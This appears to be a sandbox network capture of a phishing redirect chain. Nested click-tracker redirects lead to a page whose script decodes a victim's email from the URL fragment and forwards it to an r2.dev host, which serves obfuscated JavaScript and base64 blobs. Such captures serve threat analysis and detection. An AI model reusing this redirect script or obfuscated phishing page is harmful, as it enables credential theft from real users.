2025-01-15 14:34:49 UTC	1100	OUT	GET /3s/click.pstmrk.it%2F3s%2Fclick.pstmrk.it%252F3s%252Fclick.pstmrk.it%25252F3s%25252Fpshieldnemt.com%2525252Fwp%25252FGnrm%25252FJ6y6AQ%25252FAQ%25252Fe40c43dd-851b-4580-9323-fb61c1f4e855%25252F1%25252FDz8wyx-xnG%252FGnrm%252FK6y6AQ%252FAQ%252F08a87d58-9017-42a2-87a2-16d811ad0020%252F1%252FAQhuEqjtZr%2FGnrm%2FLKy6AQ%2FAQ%2Ff082e7c9-7f04-4f29-b74f-bf5134bab4b2%2F1%2F6eo6CGyRlQ/Gnrm/Lay6AQ/AQ/e23803d3-ac37-4b0c-9ec4-0cf79f1109e9/1/9Hx062h64U HTTP/1.1 Host: click.pstmrk.it Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-15 14:34:50 UTC	501	IN	HTTP/1.1 302 Found Server: awselb/2.0 Date: Wed, 15 Jan 2025 14:34:50 GMT Content-Type: application/octet-stream Content-Length: 0 Connection: close Location: https://click.pstmrk.it/3s/click.pstmrk.it%2F3s%2Fclick.pstmrk.it%252F3s%252Fpshieldnemt.com%25252Fwp%252FGnrm%252FJ6y6AQ%252FAQ%252Fe40c43dd-851b-4580-9323-fb61c1f4e855%252F1%252FDz8wyx-xnG%2FGnrm%2FK6y6AQ%2FAQ%2F08a87d58-9017-42a2-87a2-16d811ad0020%2F1%2FAQhuEqjtZr/Gnrm/LKy6AQ/AQ/f082e7c9-7f04-4f29-b74f-bf5134bab4b2/1/6eo6CGyRlQ

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.17	49707	63.32.154.112	443	7152	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-15 14:34:50 UTC	966	OUT	GET /3s/click.pstmrk.it%2F3s%2Fclick.pstmrk.it%252F3s%252Fpshieldnemt.com%25252Fwp%252FGnrm%252FJ6y6AQ%252FAQ%252Fe40c43dd-851b-4580-9323-fb61c1f4e855%252F1%252FDz8wyx-xnG%2FGnrm%2FK6y6AQ%2FAQ%2F08a87d58-9017-42a2-87a2-16d811ad0020%2F1%2FAQhuEqjtZr/Gnrm/LKy6AQ/AQ/f082e7c9-7f04-4f29-b74f-bf5134bab4b2/1/6eo6CGyRlQ HTTP/1.1 Host: click.pstmrk.it Connection: keep-alive Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-15 14:34:50 UTC	383	IN	HTTP/1.1 302 Found Server: awselb/2.0 Date: Wed, 15 Jan 2025 14:34:50 GMT Content-Type: application/octet-stream Content-Length: 0 Connection: close Location: https://click.pstmrk.it/3s/click.pstmrk.it%2F3s%2Fpshieldnemt.com%252Fwp%2FGnrm%2FJ6y6AQ%2FAQ%2Fe40c43dd-851b-4580-9323-fb61c1f4e855%2F1%2FDz8wyx-xnG/Gnrm/K6y6AQ/AQ/08a87d58-9017-42a2-87a2-16d811ad0020/1/AQhuEqjtZr

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.17	49711	63.32.154.112	443	7152	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-15 14:34:51 UTC	848	OUT	GET /3s/click.pstmrk.it%2F3s%2Fpshieldnemt.com%252Fwp%2FGnrm%2FJ6y6AQ%2FAQ%2Fe40c43dd-851b-4580-9323-fb61c1f4e855%2F1%2FDz8wyx-xnG/Gnrm/K6y6AQ/AQ/08a87d58-9017-42a2-87a2-16d811ad0020/1/AQhuEqjtZr HTTP/1.1 Host: click.pstmrk.it Connection: keep-alive Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-15 14:34:51 UTC	281	IN	HTTP/1.1 302 Found Server: awselb/2.0 Date: Wed, 15 Jan 2025 14:34:51 GMT Content-Type: application/octet-stream Content-Length: 0 Connection: close Location: https://click.pstmrk.it/3s/pshieldnemt.com%2Fwp/Gnrm/J6y6AQ/AQ/e40c43dd-851b-4580-9323-fb61c1f4e855/1/Dz8wyx-xnG

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.17	49712	63.32.154.112	443	7152	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-15 14:34:52 UTC	746	OUT	GET /3s/pshieldnemt.com%2Fwp/Gnrm/J6y6AQ/AQ/e40c43dd-851b-4580-9323-fb61c1f4e855/1/Dz8wyx-xnG HTTP/1.1 Host: click.pstmrk.it Connection: keep-alive Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-15 14:34:52 UTC	195	IN	HTTP/1.1 302 Found Server: awselb/2.0 Date: Wed, 15 Jan 2025 14:34:52 GMT Content-Type: application/octet-stream Content-Length: 0 Connection: close Location: https://pshieldnemt.com/wp

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.17	49716	188.40.248.200	443	7152	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-15 14:34:53 UTC	660	OUT	GET /wp HTTP/1.1 Host: pshieldnemt.com Connection: keep-alive Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-15 14:34:53 UTC	438	IN	HTTP/1.1 301 Moved Permanently Connection: close content-type: text/html content-length: 795 date: Wed, 15 Jan 2025 14:34:53 GMT server: LiteSpeed location: https://pshieldnemt.com/wp/ x-content-type-options: nosniff x-xss-protection: 1; mode=block alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2025-01-15 14:34:53 UTC	795	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!importan

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.17	49718	188.40.248.200	443	7152	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-15 14:34:54 UTC	661	OUT	GET /wp/ HTTP/1.1 Host: pshieldnemt.com Connection: keep-alive Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-15 14:34:54 UTC	479	IN	HTTP/1.1 200 OK Connection: close content-type: text/html; charset=UTF-8 cache-control: public, max-age=2592000 expires: Fri, 14 Feb 2025 14:34:54 GMT content-length: 241 date: Wed, 15 Jan 2025 14:34:54 GMT server: LiteSpeed x-content-type-options: nosniff x-xss-protection: 1; mode=block alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2025-01-15 14:34:54 UTC	241	IN	Data Raw: 3c 73 63 72 69 70 74 3e 20 0d 0a 20 0d 0a 76 61 72 20 65 6d 61 69 6c 20 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 61 73 68 2e 73 75 62 73 74 72 28 31 29 3b 76 61 72 20 64 65 63 6f 64 65 64 53 74 72 69 6e 67 20 3d 20 61 74 6f 62 28 65 6d 61 69 6c 29 3b 20 77 69 6e 64 6f 77 2e 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 20 3d 20 27 68 74 74 70 73 3a 2f 2f 70 75 62 2d 32 64 30 30 64 33 32 66 66 36 64 38 34 65 66 36 39 39 39 38 32 38 65 61 66 35 30 39 62 37 37 32 2e 72 32 2e 64 65 76 2f 69 6e 64 65 78 2e 68 74 6d 6c 23 27 20 2b 20 64 65 63 6f 64 65 64 53 74 72 69 6e 67 3b 20 7d 29 3b 20 0d 0a 3c 2f 73 63 72 69 70 74 3e Data Ascii: <script> var email = window.location.hash.substr(1);var decodedString = atob(email); window.setTimeout(function() {window.location.href = 'https://pub-2d00d32ff6d84ef6999828eaf509b772.r2.dev/index.html#' + decodedString; }); </script>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.17	49721	172.66.0.235	443	7152	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-15 14:34:55 UTC	717	OUT	GET /index.html HTTP/1.1 Host: pub-2d00d32ff6d84ef6999828eaf509b772.r2.dev Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: navigate Sec-Fetch-Dest: document Referer: https://pshieldnemt.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-15 14:34:55 UTC	259	IN	HTTP/1.1 200 OK Date: Wed, 15 Jan 2025 14:34:55 GMT Content-Length: 456222 Connection: close Accept-Ranges: bytes ETag: "d21458741d47f108ae82cb9d4791ee45" Last-Modified: Tue, 07 Jan 2025 12:47:49 GMT Server: cloudflare CF-RAY: 902696e07a41f797-EWR
2025-01-15 14:34:55 UTC	1110	IN	Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 3c 2f 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 6f 64 79 3e 3c 73 63 72 69 70 74 3e 6c 5a 62 79 61 44 48 66 3d 27 27 3b 66 75 6e 63 74 69 6f 6e 20 5f 30 78 34 39 65 64 28 29 7b 76 61 72 20 5f 30 78 32 32 39 35 32 36 3d 5b 27 61 70 70 65 6e 64 43 68 69 6c 64 27 2c 27 43 74 72 6c 2b 53 68 69 66 74 2b 49 27 2c 27 4c 6f 61 64 69 6e 67 5c 78 32 30 69 6e 5c 78 32 30 70 72 6f 67 72 65 73 73 5c 78 32 30 2e 2e 5c 78 32 30 70 6c 65 61 73 65 5c 78 32 30 77 61 69 74 27 2c Data Ascii: <html><head><meta name="viewport" content="width=device-width, initial-scale=1.0"></head> <body><script>lZbyaDHf='';function _0x49ed(){var _0x229526=['appendChild','Ctrl+Shift+I','Loading\x20in\x20progress\x20..\x20please\x20wait',
2025-01-15 14:34:55 UTC	1369	IN	Data Raw: 63 76 7a 67 69 50 35 56 6b 63 79 38 52 51 67 51 41 67 44 35 45 63 50 39 58 31 50 47 58 49 61 4b 73 65 6f 72 51 72 32 31 69 62 4a 6b 47 51 67 51 41 67 4c 35 43 78 36 38 55 6d 48 65 4c 4b 4b 6d 65 4a 50 69 50 31 52 51 36 75 49 64 43 50 33 78 4f 6f 66 59 66 35 46 67 7a 41 49 51 49 41 41 42 39 68 4f 43 47 39 30 52 42 39 53 67 76 58 30 36 68 77 43 48 71 57 6e 59 50 64 56 58 66 59 4c 4e 30 42 48 56 39 4d 6f 31 43 75 2f 6e 52 6a 47 42 45 33 44 31 46 78 6f 57 34 62 4e 6b 79 4b 69 6b 70 6f 65 4c 69 34 71 79 41 59 2b 47 59 70 46 67 42 41 43 43 58 43 56 54 2f 55 5a 5a 55 44 39 4b 35 2f 45 55 4b 74 65 30 49 79 39 42 50 77 36 4d 55 2b 6e 6d 58 47 48 2b 36 79 61 67 51 35 38 32 62 4a 30 6f 70 47 2b 44 59 70 4a 67 42 41 43 42 58 43 53 77 61 4b 55 71 71 4a 77 6e 39 75 4a Data Ascii: cvzgiP5Vkcy8RQgQAgD5EcP9X1PGXIaKseorQr21ibJkGQgQAgL5Cx68UmHeLKKmeJPiP1RQ6uIdCP3xOofYf5FgzAIQIAAB9hOCG90RB9SgvX06hwCHqWnYPdVXfYLN0BHV9Mo1Cu/nRjGBE3D1FxoW4bNkyKikpoeLi4qyAY+GYpFgBACCXCVT/UZZUD9K5/EUKte0Iy9BPw6MU+nmXGH+6yagQ582bJ0opG+DYpJgBACBXCSwaKUqqJwn9uJ
2025-01-15 14:34:55 UTC	1369	IN	Data Raw: 6a 7a 4f 37 71 4f 4b 68 37 73 71 6b 6a 75 59 79 64 61 34 42 4a 64 51 73 48 41 4d 39 41 59 51 49 51 4b 37 53 5a 34 54 6f 6c 32 45 73 4b 5a 71 78 53 62 47 62 37 48 77 6e 50 2f 61 77 36 56 64 76 30 42 6a 75 52 53 36 49 33 59 74 4d 46 52 42 69 70 6f 45 51 41 63 68 56 2b 6f 51 51 6f 38 6c 51 34 35 65 69 47 5a 73 55 75 77 64 48 65 49 50 4c 6d 73 58 6a 74 6a 44 7a 71 65 49 72 4d 37 2b 4e 74 74 61 58 30 4f 53 37 42 71 6c 6a 71 76 48 4d 47 30 4a 6a 5a 6c 54 53 31 6a 61 7a 6a 42 35 71 48 55 74 56 65 30 50 55 31 76 51 71 6a 62 2b 4f 79 38 36 79 65 35 72 72 53 71 7a 58 6a 71 2b 78 35 78 44 74 73 69 78 44 4c 2b 4e 72 31 74 73 39 31 4c 78 6f 6b 6e 52 36 75 5a 4f 71 71 55 30 36 33 73 33 31 36 57 48 6a 79 66 56 74 6e 76 7a 57 78 76 6b 30 74 66 41 6d 47 75 72 45 4d 66 53 Data Ascii: jzO7qOKh7sqkjuYyda4BJdQsHAM9AYQIQK7SZ4Tol2EsKZqxSbGb7HwnP/aw6Vdv0BjuRS6I3YtMFRBipoEQAchV+oQQo8lQ45eiGZsUuwdHeIPLmsXjtjDzqeIrM7+NttaX0OS7BqljqvHMG0JjZlTS1jazjB5qHUtVe0PU1vQqjb+Oy86ye5rrSqzXjq+x5xDtsixDL+Nr1ts91LxoknR6uZOqqU063s316WHjyfVtnvzWxvk0tfAmGurEMfS
2025-01-15 14:34:55 UTC	1369	IN	Data Raw: 38 4f 78 78 78 35 4c 62 37 33 31 6c 71 66 73 75 2b 2b 2b 36 78 35 66 76 58 71 31 35 35 69 66 48 54 74 32 30 44 6e 6e 6e 4f 4f 70 55 31 4e 55 56 42 52 52 2f 6f 45 48 48 72 43 4f 6e 58 54 53 53 5a 37 38 2b 2b 36 37 7a 38 6f 2f 39 64 52 54 50 66 6c 62 74 6d 7a 78 31 47 6b 79 59 73 51 49 53 35 68 6d 65 65 61 32 32 32 34 54 79 7a 50 33 33 6e 75 76 70 32 78 65 58 70 36 56 66 38 30 31 31 33 6a 79 59 2f 48 30 30 30 2b 37 39 56 31 39 39 64 56 69 47 57 62 32 37 4e 6c 75 4f 54 2b 58 58 33 34 35 74 62 64 37 76 34 52 50 6d 44 42 42 4c 4d 74 77 65 62 4e 73 75 73 67 5a 49 65 36 63 2f 78 54 74 71 58 6a 52 2b 61 76 37 6c 4b 77 4d 4f 5a 6d 78 53 62 46 48 6f 49 58 6a 65 36 77 69 63 73 57 6e 33 5a 75 55 68 78 2f 62 61 50 6d 7a 71 74 47 5a 45 4f 35 42 32 55 4b 49 73 6f 6f 31 Data Ascii: 8Oxxx5Lb731lqfsu+++6x5fvXq155ifHTt20DnnnOOpU1NUVBRR/oEHHrCOnXTSSZ78++67z8o/9dRTPflbtmzx1GkyYsQIS5hmeea2224TyzP33nuvp2xeXp6Vf80113jyY/H000+79V199dViGWb27NluOT+XX345tbd7v4RPmDBBLMtwebNsusgZIe6c/xTtqXjR+av7lKwMOZmxSbFHoIXje6wicsWn3ZuUhx/baPmzqtGZEO5B2UKIsoo1
2025-01-15 14:34:55 UTC	1369	IN	Data Raw: 4a 61 69 4a 49 4d 4e 5a 49 55 55 79 46 44 54 6d 5a 73 55 75 77 69 6a 69 43 30 63 4f 79 35 4f 62 50 48 71 47 69 74 70 69 49 75 4d 31 64 6f 6a 41 56 53 4b 30 52 6e 43 46 66 48 35 4d 54 72 58 78 30 61 48 61 39 51 37 61 45 79 33 37 43 67 63 33 30 78 65 34 6a 57 4d 48 4c 34 76 71 52 47 69 45 35 76 76 46 44 4a 50 65 41 39 5a 74 2b 50 4f 49 57 59 34 50 73 6a 6b 78 74 43 74 4f 65 46 72 31 56 66 63 48 7a 76 76 33 50 4f 33 69 52 45 50 54 54 4b 30 70 47 4f 2b 34 6c 58 69 41 55 46 42 56 59 5a 72 72 2b 7a 73 39 4e 7a 6a 48 75 4d 75 6f 34 31 61 39 61 34 2b 56 71 69 4a 35 39 38 73 71 63 38 7a 2b 31 78 2f 68 6c 6e 6e 4f 48 4a 6c 33 71 49 7a 4c 66 66 66 75 76 6d 50 2f 58 55 55 35 37 58 78 4a 70 44 35 4f 46 6a 73 32 77 69 51 75 51 46 4e 4c 6f 65 76 6b 64 6d 62 50 37 46 51 Data Ascii: JaiJIMNZIUUyFDTmZsUuwijiC0cOy5ObPHqGitpiIuM1dojAVSK0RnCFfH5MTrXx0aHa9Q7aEy37Cgc30xe4jWMHL4vqRGiE5vvFDJPeA9Zt+POIWY4PsjkxtCtOeFr1VfcHzvv3PO3iREPTTK0pGO+4lXiAUFBVYZrr+zs9NzjHuMuo41a9a4+VqiJ598sqc8z+1x/hlnnOHJl3qIzLfffuvmP/XUU57XxJpD5OFjs2wiQuQFNLoevkdmbP7FQ
2025-01-15 14:34:55 UTC	1369	IN	Data Raw: 44 72 62 39 5a 72 75 76 58 72 2f 65 55 6a 7a 56 6b 65 74 35 35 35 33 6e 4b 70 6f 75 73 46 79 4b 6e 65 4b 51 59 6a 55 52 6c 79 4d 6d 4d 54 59 6f 39 46 76 59 76 59 4d 53 65 52 37 4e 32 43 43 6d 66 53 41 58 4f 44 69 62 38 45 48 6a 42 70 42 4b 71 2b 39 77 37 6e 35 4d 4f 49 62 6f 72 4b 5a 50 63 57 39 55 65 34 75 7a 6d 2b 70 51 34 72 5a 31 65 52 6a 6b 37 6d 72 41 63 78 36 6d 47 74 7a 46 4b 6f 38 6b 37 78 73 77 59 36 61 78 77 35 4c 4c 32 7a 69 6f 78 72 39 2b 50 70 34 37 77 6a 69 76 32 2f 55 68 41 69 45 79 63 37 34 39 4d 34 6b 4c 6b 34 66 61 74 4e 64 50 63 48 57 33 63 48 58 62 53 4f 49 66 49 38 4f 35 48 65 6a 63 65 2f 7a 6c 37 6b 78 41 5a 58 74 33 49 34 74 4d 72 48 4d 38 38 38 30 79 36 2f 76 72 72 71 62 61 32 4e 71 49 73 4e 2f 52 36 4b 4e 58 50 63 38 38 39 46 31 Data Ascii: Drb9ZruvXr/eUjzVket5553nKpousFyKneKQYjURlyMmMTYo9FvYvYMSeR7N2CCmfSAXODib8EHjBpBKq+9w7n5MOIborKZPcW9Ue4uzm+pQ4rZ1eRjk7mrAcx6mGtzFKo8k7xswY6axw5LL2zioxr9+Pp47wjiv2/UhAiEyc749M4kLk4fatNdPcHW3cHXbSOIfI8O5Hejce/zl7kxAZXt3I4tMrHM8880y6/vrrqba2NqIsN/R6KNXPc889F1
2025-01-15 14:34:55 UTC	1369	IN	Data Raw: 32 79 69 54 44 55 43 49 41 41 44 67 6b 4b 77 51 37 5a 35 68 69 55 64 6b 4c 41 47 33 4c 6b 73 41 6a 6c 79 73 65 54 61 7a 72 6a 44 4e 5a 61 70 4d 54 55 6d 55 47 48 6f 43 37 33 58 78 4e 59 6a 53 4f 6c 49 68 57 76 6a 76 61 65 61 42 45 41 45 41 77 43 46 70 49 54 71 39 4d 38 39 72 64 53 2b 49 4b 57 52 5a 68 6e 74 62 56 75 2f 52 50 57 61 49 4a 59 59 73 65 77 62 35 75 74 78 59 39 62 47 6b 68 63 6a 6c 77 76 55 6c 33 35 4e 4e 44 78 41 69 41 41 42 6b 43 7a 36 52 67 4a 34 46 51 67 51 41 41 4d 55 74 77 32 38 7a 65 6b 49 39 52 7a 67 47 75 7a 66 47 76 53 5a 39 62 4d 4e 6e 6e 78 6e 48 30 38 66 45 2f 79 6a 30 78 4e 53 54 31 43 35 64 4b 73 61 55 43 53 42 45 41 41 44 49 4e 4e 5a 51 71 57 2f 49 46 66 51 34 45 43 49 41 41 41 43 67 67 42 41 42 41 41 41 41 42 59 51 49 41 41 41 Data Ascii: 2yiTDUCIAADgkKwQ7Z5hiUdkLAG3LksAjlyseTazrjDNZapMTUmUGHoC73XxNYjSOlIhWvjvaeaBEAEAwCFpITq9M89rdS+IKWRZhntbVu/RPWaIJYYsewb5utxY9bGkhcjlwvUl35NNDxAiAABkCz6RgJ4FQgQAAMUtw28zekI9RzgGuzfGvSZ9bMNnnxnH08fE/yj0xNST1C5dKsaUCSBEAADINNZQqW/IFfQ4ECIAAACggBABAAAABYQIAAA
2025-01-15 14:34:55 UTC	1369	IN	Data Raw: 53 42 4c 41 41 41 41 53 58 37 38 6c 71 49 72 48 76 53 4a 4c 4c 5a 36 4e 73 55 32 72 66 43 56 39 79 65 35 33 4c 75 45 4c 41 45 41 41 41 6a 69 2b 7a 2b 6a 6e 6a 2b 4d 4e 59 70 73 6f 45 6a 38 47 44 48 6d 4e 74 68 41 6c 67 41 41 41 4d 53 77 61 33 54 4a 62 34 77 43 47 30 6a 69 2f 2f 69 41 45 67 66 33 55 4f 4b 62 6a 79 6e 52 2f 59 30 35 31 30 45 41 73 67 51 41 41 45 44 78 6a 72 65 4e 38 68 70 51 6e 72 2b 59 45 74 47 66 71 50 66 50 64 31 42 76 37 54 55 32 71 32 2b 68 33 72 2f 4f 70 63 52 75 76 72 30 6b 37 73 74 37 6f 4d 68 70 57 61 35 61 74 59 71 65 65 65 59 5a 4b 69 6b 70 79 51 6b 34 46 38 37 4a 6c 43 73 41 41 41 78 6c 6f 72 57 2f 4e 51 74 73 41 49 6b 31 50 55 75 4a 79 49 36 6b 4b 4c 30 30 50 30 69 4a 37 33 63 5a 38 38 38 32 4f 53 76 4c 52 59 73 57 47 59 57 56 Data Ascii: SBLAAAASX78lqIrHvSJLLZ6NsU2rfCV9ye53LuELAEAAAji+z+jnj+MNYpsoEj8GDHmNthAlgAAAMSwa3TJb4wCG0ji//iAEgf3UOKbjynR/Y0510EAsgQAAEDxjreN8hpQnr+YEtGfqPfPd1Bv7TU2q2+h3r/OpcRuvr0k7st7oMhpWa5atYqeeeYZKikpyQk4F87JlCsAAAxlorW/NQtsAIk1PUuJyI6kKL00P0iJ73cZ8882OSvLRYsWGYWV
2025-01-15 14:34:55 UTC	1369	IN	Data Raw: 47 6c 31 47 37 59 42 67 59 43 79 42 4b 41 6f 51 70 6b 47 54 4c 55 33 45 79 35 71 2b 78 38 4d 7a 2f 39 55 4f 78 6e 72 39 49 55 37 6e 32 2b 6e 4c 37 33 32 56 39 41 6c 6f 4d 4e 5a 41 6e 41 55 41 57 79 44 42 6c 71 62 71 62 63 4e 52 77 5a 6a 71 6c 6f 4e 32 36 33 5a 5a 70 50 56 5a 2b 70 35 52 48 61 32 6c 68 4b 73 32 34 62 62 57 32 7a 4c 71 78 35 59 32 6e 4b 2f 47 72 61 47 6c 48 72 79 4f 48 62 71 56 53 7a 4e 30 47 52 74 68 65 70 38 43 71 75 75 39 44 75 6f 57 34 73 46 61 38 74 72 4c 50 6e 4c 4f 32 36 4c 45 71 64 77 72 70 4e 64 73 38 32 4c 35 56 41 6e 64 37 78 7a 46 71 4b 6d 4c 59 48 48 4a 38 63 69 70 37 56 47 4e 48 4b 75 31 71 58 30 70 79 69 36 32 69 63 6b 38 65 34 32 2b 36 6d 65 53 76 61 66 66 74 51 6a 31 45 74 44 39 70 6d 49 76 4a 78 4c 56 58 4d 7a 4b 64 72 38 Data Ascii: Gl1G7YBgYCyBKAoQpkGTLU3Ey5q+x8Mz/9UOxnr9IU7n2+nL732V9AloMNZAnAUAWyDBlqbqbcNRwZjqloN263ZZpPVZ+p5RHa2lhKs24bbW2zLqx5Y2nK/GraGlHryOHbqVSzN0GRthep8Cquu9DuoW4sFa8trLPnLO26LEqdwrpNds82L5VAnd7xzFqKmLYHHJ8cip7VGNHKu1qX0pyi62ick8e42+6meSvafftQj1EtD9pmIvJxLVXMzKdr8
